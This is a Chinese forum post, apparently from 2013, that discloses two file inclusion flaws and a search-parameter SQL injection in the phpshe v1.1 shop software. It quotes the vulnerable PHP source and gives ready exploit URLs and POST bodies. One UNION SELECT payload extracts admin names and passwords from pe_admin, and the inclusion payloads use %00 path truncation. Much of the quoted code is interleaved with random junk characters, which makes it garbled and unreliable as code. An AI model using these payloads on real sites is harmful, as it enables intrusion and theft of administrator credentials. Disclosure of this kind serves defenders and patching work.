
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By     : Kn1f32
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体参数传输流程（common.php）

所有 GET/POST/SESSION/COOKIE 参数都经 extract() 注册为 $_g_*、$_p_*、$_s_*、$_c_* 变量，过程中只做了 trim（magic_quotes 开启时再去一次反斜杠），没有任何针对 SQL 或文件路径的过滤，后文的注入和包含都源于此。

6 S( A5 R2 f6 A, d* V//common.php" e: d5 n' B5 Q' w$ y
if (get_magic_quotes_gpc()) {& t! [; G8 n" t5 Y( ]. l
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');" u. T, y3 M" \. z9 A( C0 o+ T
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');2 W7 F7 a- w2 K& r
}
! M4 C! a. y( J- x$ h9 welse {# c) C& m4 v  W; L; c  |
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');; n3 d% S" W& ]8 D, K
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');# o% W) b, Y6 ?, E5 R
}5 N+ L& s) i* ~9 D& L
session_start();1 @6 ?( E% I5 e; l2 J5 I5 p( ~, ~
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');1 S( w0 E, @7 [3 U, h
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');- T/ E! F! U) e& Y% ~7 g: A
0x01 文件包含漏洞（index.php，$mod 可控）
//首页文件
9 F# g( o! L* D9 r+ s$ u: A* {3 f# ^<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
/ E8 j- p: @. a1 rinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞# d4 Y# K8 i( \3 C/ |: ^: ~; q
pe_result();7 @: B- W: Y8 ^5 W( u
?>
//common.php 第15行开始：url 路由配置
$module = $mod = $act = 'index';) A) b7 p1 b) q6 y" B) g
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
3 B9 U5 X% t* k) g$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);; }8 {+ N2 ]6 I0 Z6 v6 \7 g
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);3 d' V- l& h$ d2 c- A
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
//说明：包含路径固定以 .php 结尾，%00 截断只在 PHP < 5.3.4 下生效（之后版本 include() 遇到空字节会报错）；高版本下只能包含任意 .php 文件，所以作者称其为“鸡肋”。
0x02 搜索注入（product.php，$_g_keyword / $_g_orderby 直接拼接 SQL）

//product.php文件
! {5 h+ e$ _2 o' K. J! C7 ccase 'list':
% a- Q* B; ^+ h; n$category_id = intval($id);, g' {( n# B' p: F3 I
$info = $db->pe_select('category', array('category_id'=>$category_id));( x& t2 E4 m  ^; j2 P3 h: H
//搜索
) s- W+ q5 N. P5 W$sqlwhere = " and `product_state` = 1";" c5 m) O* A  S1 W* e
pe_lead('hook/category.hook.php');
/ G* P7 X( h& j% L4 g0 R/ D; A1 @if ($category_id) {& i5 T2 i, t7 E9 S$ L  B
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
+ \8 \9 O* @8 [/ _. W}  w$ T  l6 }1 c. W; W' ^
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
! r, _6 ]9 {: Eif ($_g_orderby) {7 g; L! N% _6 H5 n3 n' K+ N4 j5 j
$orderby = explode('_', $_g_orderby);+ q2 }( t/ i, @& w% \
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
0 ^& [7 z; ~+ z# ]}" a4 e$ A4 C! U4 d+ b
else {4 O; [; @% K6 _4 s/ B
$sqlwhere .= " order by `product_id` desc";
# Y+ h. d! h4 p, E  |( ~}
% X4 K6 J1 t% }% ]- ?! O  c$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
: V1 f- ?/ ?& z; }( Y0 A; S- s6 R//热卖排行
8 S; V( @9 ?8 w+ q( E( k/ [$product_hotlist = product_hotlist();- d6 Y* G2 z3 y! }2 p: B7 M
//当前路径  E% W% z! [2 f" B
$nowpath = category_path($category_id);; g& l! u; }; ~. k/ b' D
$seo = pe_seo($info['category_name']);
  |, O9 K" W4 }1 _include(pe_tpl('product_list.html'));
//跟进数据库类的 pe_selectall() 函数
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())4 I1 \& A8 Q) x! I8 o' R9 x- s5 g
{1 C: h& {* g- X" q9 f# V0 u3 P
//处理条件语句9 k- ?8 K" O7 N& a5 G
$sqlwhere = $this->_dowhere($where);
% v3 F: @) l  ^# i5 P- ^& B, xreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
" L+ A" T" o  b% `1 b}, s% j  M; Y% C* k
//exp:
//product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
//说明：开头的单引号闭合 like '%...%' 的左引号，末尾的 and '1'='1 吃掉右引号和 %；union 的列数（19）必须与 product 表列数一致。


0x03 文件包含漏洞 2（order.php，info[order_payway] 可控）

//order.php

case 'pay':


) ]# E; ^6 l% c' r" b1 o9 _2 Y6 V$order_id = pe_dbhold($_g_id);


% l9 H* L0 i4 {' S/ S' p5 E$cache_payway = cache::get('payway');


& {3 D& Y. W1 R8 d  Y; qforeach($cache_payway as $k => $v) {

/ g" O8 i0 M( O! ?. Y# {9 N3 b. c
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


4 H4 f. U0 J: ?' A9 S/ gif ($k == 'bank') {

4 Z1 ]/ c3 n* Z1 [: |: p4 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


# v% g, F$ c$ @% R& [- j# H}


6 m1 C, _6 f1 A+ O}

+ E% x) I2 F* p
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

! v, A8 q8 e6 x8 z1 N; V
!$order['order_id'] && pe_error('订单号错误...');

/ H# v" h$ ^: U& D+ C* O7 ]: |( X
if (isset($_p_pesubmit)) {


. Z! R4 u  t* S8 D; W$ O1 s+ Xif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

5 _; A! Z  W) m6 H$ U" n  I9 H8 ]
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


: _( I+ ?' J- @* N% b) G) G6 uforeach ($info_list as $v) {


- h7 E8 n/ Q1 N0 y) T$order['order_name'] .= "{$v['product_name']};";# e2 j7 `5 N4 _0 |( G


, @9 D4 G0 d$ n) J  y}


( C7 w5 }9 W( t. ?2 a0 ]echo '正在为您连接支付网站,请稍后...';

% m) Z$ z4 E' Q: _
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


  j4 k: r5 v1 Q1 }. H}//当一切准备好的时候就可以进行"鸡肋包含了"

3 X! b% i9 c; A5 ^" S
else {

. W  k; N0 V2 o% H* P- s1 |
pe_error('支付错误...');

3 P' g1 d. _1 g- w; {
}

4 [* y5 M1 }  C2 {- P
}


, D' [! z1 B1 y; ^, c) N$seo = pe_seo('选择支付方式');


, x1 e. H  _  V+ s4 c9 Zinclude(pe_tpl('order_pay.html'));


% i* w, Y. D1 o, |  Nbreak;

}

//exp:
//GET  http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
//POST info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98
//说明：id 必须是一个状态为 notpay 的真实订单号（否则先报“订单号错误”），pesubmit 的值即“立即支付”；%00 截断同样只对 PHP < 5.3.4 有效。
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
